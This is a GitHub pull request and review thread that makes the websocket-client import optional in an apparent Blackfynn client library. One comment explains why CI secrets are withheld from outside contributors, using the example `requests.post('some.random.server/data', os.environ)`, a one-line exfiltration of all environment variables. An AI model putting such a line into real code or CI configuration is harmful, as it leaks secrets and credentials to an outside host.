### PR TITLE
agent wrap websocket import to allow failure

### PR DESCRIPTION
**Pull request by tgbugs**
# Description

The websocket dependency is not required unless you are actually using
the agent. This pull request makes the import optional so that the websocket
dependency is not a hard failure if it is missing. Anyone installing via pip should
never encounter this issue since websocket-client is listed in the requirements.

## Github Issue

None

## Type of change

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update

# How Has This Been Tested?

Change has been used in production sparc curation code for a couple of months.

# Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [x] I have commented my code, particularly in hard-to-understand areas
- [x] I have added unit tests that prove my fix is effective or that my feature works

### CODE REVIEW

**Comment by rlmv** [comment]
Cheers, thanks for the contribution. Out of curiosity, why is this needed? Is there a platform that does not support the websocket dependency?

This looks good to me - could you just add the following to the `except` block?
```
 logger.warn("websocket-client is not installed - uploading with the Agent will not work")
```
I'm not sure why the build is not running with the correct credentials - it might be because you're not part of the Blackfynn organization. I'll try and kick that off manually.

**Comment by tgbugs** [comment]
Done. Also if you have secret environment variables set in .travis.yml it won't run pull requests from anyone outside the org since a pr could add a line like `requests.post('some.random.server/data', os.environ)` and dump all the secrets.

**Comment by rlmv** [comment]
@tgbugs I've copied the branch to #197 to run the tests. Once those look good I'll merge that PR.

**Comment by tgbugs** [comment]
Sounds good thanks!

**Comment by rlmv** [comment]
@tgbugs #197 has been merged. I'll cut a release soon.

**Pull request closed without merging**
